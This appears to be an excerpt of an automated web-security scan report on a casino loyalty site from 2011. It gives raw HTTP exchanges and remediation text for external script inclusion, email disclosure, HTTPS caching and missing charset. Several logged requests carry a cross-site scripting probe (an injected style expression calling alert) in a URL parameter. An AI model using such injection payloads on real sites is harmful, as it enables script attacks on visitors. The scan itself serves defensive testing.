<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This page displays the overview of Total Rewards (trOverview.jsp) Cr ...[SNIP]... <li><a href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABH8Y" class =' '>TOTAL REWARDS VISA</a> ...[SNIP]... <td class="khakhiRow fontDesc"><a class="link11" target="_mbna" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABH8T"><img src="/images/presentation/total_rewards/overview/mbna.gif" alt="Total Rewards Credit Card" class="mRight10" border="0" width="77" height="77"> ...[SNIP]... <td class="khakhiRow fontDesc"> <a class="link11" target="_mbna" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABH8T"><span class="bold"> ...[SNIP]... <br> To apply or get more information, <a class="link11" target="_MBNA" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABH8T">click here</a> ...[SNIP]... </a> | <a href="https://www.harrahs.com/TotalRewards/RewardsAndBenefits.do?page=overview">Total Rewards</a> ...[SNIP]... <!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script> ...[SNIP]...
GET /hotel-reservations/?propcode=ATL+^+^+^+;view=ratecal+^+^+^+;packagecode=pgge1 HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:04 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=jx22fu55irbmucewwxpkhtvh; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:04 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43764
GET /hotel-reservations/?propcode=CLV&type=ratecal&view=ratecal HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:04 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=wry2wn552wh5qfrdxkljtf45; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:04 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61058
GET /hotel-reservations/?propcode=ATL&view=ratecal&packagecode=pspa1 HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:06 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=rdp2pn45apbsqj45nxnkidam; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:06 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 63615
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 12:09:35 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The response dynamically includes the following script from another domain:
https://mdfst.netmng.com/?aid=173
Request
GET /MakeReservation.do?action=promotions&propCode=FLV&rd=CZR_Promo_Homepage_160x80 HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:03 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000ZDjIHhCLn2lDSSGrgKjcNn3:14tlf4i0i;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title>Flamingo Las Vegas - Limited Time Prom ...[SNIP]... <!-- netmining tag - added 3/18/2010 - tws --> <script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
https://mdfst.netmng.com/?aid=173
Request
GET /TotalRewards/RewardsAndBenefits.do?page=overview HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; s_cc=true; s_sq=harconsumer%2Charrahsglobal%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:51:39 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000YcKOn5C5Bfe8bfLKWb1mAx0:14tlf4i0i;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This page displays the overview of Total Rewards (trOverview.jsp) Cr ...[SNIP]... <!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
https://mdfst.netmng.com/?aid=173
Request
GET /TotalRewards/undefined HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:57 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <!-- netmining tag - added 3/18/2010 - tws --> <script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
https://mdfst.netmng.com/?aid=173
Request
GET /destinations/reno--tahoe/hotel-casinos/market-home.shtml HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/hotel-reservations/main/?propcode=ATL+%5E+%5E+%5E+;view=ratecal+%5E+%5E+%5E+;packagecode=pgge15c682%22style%3d%22x%3aexpression(alert(%22XSS%22))%22b663ede571e User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:26:22 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 12:09:35 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <!-- netmining tag - added 3/18/2010 - tws --> <script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script> ...[SNIP]...
The following email address was disclosed in the response:
matt@mattkruse.com
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /javascript_includes/CalendarPopup.js HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Content-Length: 60449 Content-Type: application/x-javascript Last-Modified: Thu, 20 Mar 2008 15:15:44 GMT Accept-Ranges: bytes ETag: "01046449d8ac81:17ef" Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Date: Wed, 16 Mar 2011 12:23:48 GMT
// Temporary, to stop linking directly to the js file // Remove these lines before using this code (this will be removed soon) if (window.location.href.indexOf("spiralsolutions")>-1) { alert("Please ...[SNIP]... <matt@mattkruse.com> ...[SNIP]...
9. Cacheable HTTPS responsepreviousnext There are 16 instances of this issue:
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:09:18 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 124708
GET /GlobalLogin.jsp?referdomain=www.totalrewards.com&lastsync=1300278300127&source=brand&login=false&randomNumber=0.6642456234751404&accountId= HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 12:26:23 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 12:09:17 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
GET /destinations/reno--tahoe/hotel-casinos/market-home.shtml HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/hotel-reservations/main/?propcode=ATL+%5E+%5E+%5E+;view=ratecal+%5E+%5E+%5E+;packagecode=pgge15c682%22style%3d%22x%3aexpression(alert(%22XSS%22))%22b663ede571e User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:26:22 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /hotel-reservations/?propcode=CLV&type=ratecal&view=ratecal HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:04 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=wry2wn552wh5qfrdxkljtf45; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:04 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61058
GET /hotel-reservations/main/?propcode=ATL+%5E+%5E+%5E+;view=ratecal+%5E+%5E+%5E+;packagecode=pgge15c682%22style%3d%22x%3aexpression(alert(%22XSS%22))%22b663ede571e HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/hotel-reservations/?propcode=ATL+^+^+^+;view=ratecal+^+^+^+;packagecode=pgge15c682%22style%3d%22x%3aexpression(alert(%22XSS%22))%22b663ede571e User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:09:09 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Las Vegas Hot ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /images/presentation/chinese/total_rewards/go_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:56 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/myaccount.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/myaccount_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:51 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/myoffers.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
GET /images/presentation/chinese/total_rewards/myoffers_over.gif HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/TotalRewards/RewardsAndBenefits.do?page=overview User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 404 Not Found Connection: close Date: Wed, 16 Mar 2011 11:51:52 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html
